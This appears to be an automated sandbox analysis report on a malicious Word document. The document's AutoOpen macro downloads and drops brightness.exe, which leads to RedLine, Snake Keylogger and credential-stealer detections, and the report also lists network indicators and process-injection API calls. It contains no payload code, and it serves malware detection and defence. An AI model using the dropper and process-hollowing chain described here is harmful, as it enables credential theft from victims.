          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49805 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 14.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 14.1.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.brightness.exe.217d67a8.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.1.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.brightness.exe.218133d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 11.2.Nsltarpn.PIF.210035b8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.brightness.exe.217d67a8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Document contains an embedded VBA with functions possibly related to ADO stream file operations
          Source: PI ITS15235.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, writeName: AutoOpen
          Document contains an embedded VBA with functions possibly related to HTTP operations
          Source: PI ITS15235.docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: AutoOpen
          Office process drops PE file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
          Office process queries suspicious COM object (likely to drop second stage)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291824C NtReadVirtualMemory,4_2_0291824C
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029184BC NtUnmapViewOfSection,4_2_029184BC
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02918BA8
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029179AC NtAllocateVirtualMemory,4_2_029179AC
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_0291DE78
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_0291DFE4
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_0291DF00
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02917CF8 NtWriteVirtualMemory,4_2_02917CF8
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02918BA6
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029179AA NtAllocateVirtualMemory,4_2_029179AA
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_0291DE24
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E824C NtReadVirtualMemory,11_2_027E824C
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E84BC NtUnmapViewOfSection,11_2_027E84BC
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_027E8BA8
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E79AC NtAllocateVirtualMemory,11_2_027E79AC
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027EDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_027EDE78
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027EDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_027EDF00
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027EDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,11_2_027EDFE4
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E7CF8 NtWriteVirtualMemory,11_2_027E7CF8
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_027E8BA6
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027E79AA NtAllocateVirtualMemory,11_2_027E79AA
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027EDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_027EDE24
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,4_2_0291F0A8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029020C44_2_029020C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00408C608_2_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040DC118_2_0040DC11
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00407C3F8_2_00407C3F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00418CCC8_2_00418CCC
